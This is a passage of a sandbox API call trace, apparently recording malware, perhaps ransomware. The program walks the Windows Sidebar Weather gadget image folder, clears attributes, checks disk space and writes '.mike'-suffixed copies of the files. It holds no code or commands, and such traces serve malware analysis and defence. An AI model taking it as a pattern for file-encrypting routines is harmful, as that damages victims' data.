(x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png", dwFileAttributes=0x80) returned 0 [0134.316] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.324] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png", dwFileAttributes=0x80) returned 0 [0134.325] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.345] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png", dwFileAttributes=0x80) returned 0 [0134.346] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.351] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png", dwFileAttributes=0x80) returned 0 [0134.353] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.357] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png", dwFileAttributes=0x80) returned 0 [0134.359] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.364] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png", dwFileAttributes=0x80) returned 0 [0134.365] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.372] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\5.png", dwFileAttributes=0x80) returned 0 [0134.373] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.395] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png", dwFileAttributes=0x80) returned 0 [0134.396] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.402] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\7.png", dwFileAttributes=0x80) returned 0 [0134.404] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.410] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png", dwFileAttributes=0x80) returned 0 [0134.411] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.423] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\9.png", dwFileAttributes=0x80) returned 0 [0134.424] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.433] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\activity16v.png", dwFileAttributes=0x80) returned 0 [0134.434] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.439] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png", dwFileAttributes=0x80) returned 0 [0134.440] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.445] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png", dwFileAttributes=0x80) returned 0 [0134.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.470] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png", dwFileAttributes=0x80) returned 0 [0134.471] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.477] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png", dwFileAttributes=0x80) returned 0 [0134.478] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.484] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png", dwFileAttributes=0x80) returned 0 [0134.485] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.490] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png", dwFileAttributes=0x80) returned 0 [0134.492] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.499] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png", dwFileAttributes=0x80) returned 0 [0134.500] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.505] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png", dwFileAttributes=0x80) returned 0 [0134.514] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.519] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png", dwFileAttributes=0x80) returned 0 [0134.520] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.535] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png", dwFileAttributes=0x80) returned 0 [0134.536] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.541] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png", dwFileAttributes=0x80) returned 0 [0134.543] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.548] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png", dwFileAttributes=0x80) returned 0 [0134.549] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.559] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png", dwFileAttributes=0x80) returned 0 [0134.560] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.565] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png", dwFileAttributes=0x80) returned 0 [0134.567] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.573] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png", dwFileAttributes=0x80) returned 0 [0134.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.580] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png", dwFileAttributes=0x80) returned 0 [0134.582] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.588] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png", dwFileAttributes=0x80) returned 0 [0134.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.601] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png", dwFileAttributes=0x80) returned 0 [0134.603] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.609] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png", dwFileAttributes=0x80) returned 0 [0134.611] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.617] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.618] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.623] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png", dwFileAttributes=0x80) returned 0 [0134.625] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.630] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.631] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.637] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png", dwFileAttributes=0x80) returned 0 [0134.638] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.646] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.648] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.653] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png", dwFileAttributes=0x80) returned 0 [0134.654] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.662] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.664] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.669] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png", dwFileAttributes=0x80) returned 0 [0134.670] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.676] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.678] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.685] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png", dwFileAttributes=0x80) returned 0 [0134.687] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.692] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.694] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.699] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png", dwFileAttributes=0x80) returned 0 [0134.701] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.706] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.708] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.745] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png.mike", lpFilePart=0x0) returned 0x6e [0134.749] WriteFile (in: hFile=0x284, lpBuffer=0x22bf580*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22bf580*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.751] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png", dwFileAttributes=0x80) returned 0 [0134.755] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png", lpFilePart=0x0) returned 0x69 [0134.757] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png", lpFilePart=0x0) returned 0x77 [0134.758] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.759] WriteFile (in: hFile=0x284, lpBuffer=0x22c5578*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22c5578*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.761] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.764] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x7c [0134.764] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.765] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.mike", lpFilePart=0x0) returned 0x7c [0134.765] WriteFile (in: hFile=0x284, lpBuffer=0x22d7bf0*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22d7bf0*, lpNumberOfBytesWritten=0x2af074*=0x360, lpOverlapped=0x0) returned 1 [0134.767] WriteFile (in: hFile=0x284, lpBuffer=0x22daec8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22daec8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.768] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0134.769] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png", lpFilePart=0x0) returned 0x77 [0134.771] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png", lpFilePart=0x0) returned 0x5b [0134.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, 